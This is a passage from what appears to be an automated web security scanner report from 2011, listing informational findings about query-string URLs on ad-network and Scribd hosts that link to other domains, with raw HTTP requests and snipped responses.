document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

18.15. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115706&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097706824&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315097706982&frm=4&adk=1607234649&ga_vid=1374080911.1315097707&ga_sid=1315097707&ga_hid=486991809&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=247&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=617&xpc=yKatmybmDr&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEeZAi0MNZ0nSRwEb8-GFgs1kCttQ

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115706&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097706824&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315097706982&frm=4&adk=1607234649&ga_vid=1374080911.1315097707&ga_sid=1315097707&ga_hid=486991809&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=247&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=617&xpc=yKatmybmDr&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:54:29 GMT
Server: cafe
Cache-Control: private
Content-Length: 4157
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEeZAi0MNZ0nSRwEb8-GFgs1kCttQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

18.16. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315116151&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html&dt=1315098151576&bpp=4&shv=r20110824&jsv=r20110719&correlator=1315098151731&frm=4&adk=1607234649&ga_vid=1674271352.1315098152&ga_sid=1315098152&ga_hid=1278190803&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=268&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=338&xpc=FQEN0g4JJE&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHo7SBDCF2uslnemtGZcmE44Bq3iQ

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315116151&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html&dt=1315098151576&bpp=4&shv=r20110824&jsv=r20110719&correlator=1315098151731&frm=4&adk=1607234649&ga_vid=1674271352.1315098152&ga_sid=1315098152&ga_hid=1278190803&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=268&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=338&xpc=FQEN0g4JJE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 01:01:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 4097
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHo7SBDCF2uslnemtGZcmE44Bq3iQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

18.17. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115693&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097710130&bpp=24&shv=r20110824&jsv=r20110719&correlator=1315097710547&frm=4&adk=1607234649&ga_vid=1516282008.1315097711&ga_sid=1315097711&ga_hid=478706506&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=246&biw=1217&bih=1037&eid=33895167%2C36887102&fu=0&ifi=1&dtd=532&xpc=tWKiPIw10q&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%2BScanner%26adU%3Dtrust-guard.com/technologyindustries%26adT%3DWebsite%2BSecurity%2BHere%26gl%3DUS&usg=AFQjCNGmI3hB4sGEIhlB1reRmGreSbQArQ

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115693&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097710130&bpp=24&shv=r20110824&jsv=r20110719&correlator=1315097710547&frm=4&adk=1607234649&ga_vid=1516282008.1315097711&ga_sid=1315097711&ga_hid=478706506&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=246&biw=1217&bih=1037&eid=33895167%2C36887102&fu=0&ifi=1&dtd=532&xpc=tWKiPIw10q&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: cafe
Cache-Control: private
Content-Length: 12725
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%2BScanner%26adU%3Dtrust-guard.com/technologyindustries%26adT%3DWebsite%2BSecurity%2BHere%26gl%3DUS&usg=AFQjCNGmI3hB4sGEIhlB1reRmGreSbQArQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.18. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315116134&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html&dt=1315098160075&bpp=16&shv=r20110824&jsv=r20110719&correlator=1315098160332&frm=4&adk=1607234649&ga_vid=2026745983.1315098160&ga_sid=1315098160&ga_hid=935076766&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&fu=0&ifi=1&dtd=387&xpc=PO0BPGvJ0B&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Dvulnerability.scan.qualys.com%26adT%3DSecurity%2BVulnerability%2BScanner%26adU%3Dgfi.com/Business-Antivirus%26adT%3DSMB%2BCyber%2BProtection%2BTips%26gl%3DUS&usg=AFQjCNFAnYMx1TYuYqPvlmySuAsVJGADVw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315116134&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html&dt=1315098160075&bpp=16&shv=r20110824&jsv=r20110719&correlator=1315098160332&frm=4&adk=1607234649&ga_vid=2026745983.1315098160&ga_sid=1315098160&ga_hid=935076766&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&fu=0&ifi=1&dtd=387&xpc=PO0BPGvJ0B&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 01:02:03 GMT
Server: cafe
Cache-Control: private
Content-Length: 12665
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Dvulnerability.scan.qualys.com%26adT%3DSecurity%2BVulnerability%2BScanner%26adU%3Dgfi.com/Business-Antivirus%26adT%3DSMB%2BCyber%2BProtection%2BTips%26gl%3DUS&usg=AFQjCNFAnYMx1TYuYqPvlmySuAsVJGADVw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.19. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9055644179108667&output=html&h=125&slotname=6753566882&w=130&lmt=1315115338&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&dt=1315097338895&shv=r20110824&jsv=r20110719&saldr=1&correlator=1315097338906&frm=7&adk=1459060001&ga_vid=1034678471.1315097339&ga_sid=1315097339&ga_hid=333995562&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=3636996462&fu=4&ifi=1&dtd=14

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904%26hl%3Den%26client%3Dca-pub-9055644179108667%26adU%3DGoDaddy.com/SSL%26adT%3D%252412.99%2BGoDaddy%2BSSL%2BSave%26gl%3DUS&usg=AFQjCNE-4kdAeCWujwFJxVMFnVYRoLPgjQ

Request

GET /pagead/ads?client=ca-pub-9055644179108667&output=html&h=125&slotname=6753566882&w=130&lmt=1315115338&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&dt=1315097338895&shv=r20110824&jsv=r20110719&saldr=1&correlator=1315097338906&frm=7&adk=1459060001&ga_vid=1034678471.1315097339&ga_sid=1315097339&ga_hid=333995562&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=3636996462&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:48:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 4339
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(a){window.status=a;return!0};})();function su(id) {var a = docu
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904%26hl%3Den%26client%3Dca-pub-9055644179108667%26adU%3DGoDaddy.com/SSL%26adT%3D%252412.99%2BGoDaddy%2BSSL%2BSave%26gl%3DUS&usg=AFQjCNE-4kdAeCWujwFJxVMFnVYRoLPgjQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

18.20. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/

The response contains the following link to another domain:

http://c.casalemedia.com/c/1/1/89733/http:/altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:48 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4480
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025" target="_blank"><img src="http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.jpg" width="720" height="300" border="0" alt="">
...[SNIP]...

18.21. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string:

http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=

The response contains the following link to another domain:

http://get.adobe.com/flashplayer/

Request

Response

18.22. http://s6.scribdassets.com/aggregated/javascript/base.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s6.scribdassets.com
Path:	/aggregated/javascript/base.js

Issue detail

The page was loaded from a URL containing a query string:

http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997

The response contains the following links to other domains:

http://support.scribd.com/
http://www.scribd.com/
http://www.scribd.com/documents
http://www.scribd.com/facebookfaq
http://www.scribd.com/inbox
http://www.scribd.com/logout
http://www.scribd.com/my_document_collections
http://www.scribd.com/people/view/

Request

GET /aggregated/javascript/base.js?1314908997 HTTP/1.1
Host: s6.scribdassets.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:30 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n43.panthercdn.com
Cache-Control: max-age=315360000
Expires: Sun, 29 Aug 2021 20:36:07 GMT
Age: 188423
Content-Length: 640059
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Thu, 01 Sep 2011 20:33:47 GMT
Connection: keep-alive

/* :asset_packager_compatibility, 'config/asset_packages.yml' @ 1314908997 */
/* public/javascripts/prototype_uncompressed.js @ 1314908997 */

var Prototype={Version:'1.6.1',Browser:(function(){var ua
...[SNIP]...
<img src="/images/icons/fb_icon_15x15.gif" class="facebook_notice_icon">\
<a href="http://www.scribd.com/people/view/#{word_user_id}" class="menu_control">#{word_user_name}</a>
...[SNIP]...
<li><a href="http://www.scribd.com/">My Home</a>
...[SNIP]...
<li><a href="http://www.scribd.com/people/view/#{word_user_id}">View Public Profile</a>
...[SNIP]...
<li><a href="http://www.scribd.com/documents">My Documents</a>
...[SNIP]...
<li><a href="http://www.scribd.com/my_document_collections">My Collections</a>
...[SNIP]...
<li><a href="http://www.scribd.com/inbox">Messages</a>
...[SNIP]...
<li><a href="http://support.scribd.com">Help</a>
...[SNIP]...
<li><a href="http://www.scribd.com/logout">Log Out</a>
...[SNIP]...
</p><a href="http://www.scribd.com/facebookfaq" target="_blank">Learn More</a>
...[SNIP]...

18.23. http://static.lingospot.com/js/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.lingospot.com
Path:	/js/all.js

Issue detail

The page was loaded from a URL containing a query string:

http://static.lingospot.com/js/all.js?810

The response contains the following links to other domains:

http://eplayer.clipsyndicate.com/cs_api/get_swf
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.adobe.com/go/getflash/

Request

GET /js/all.js?810 HTTP/1.1
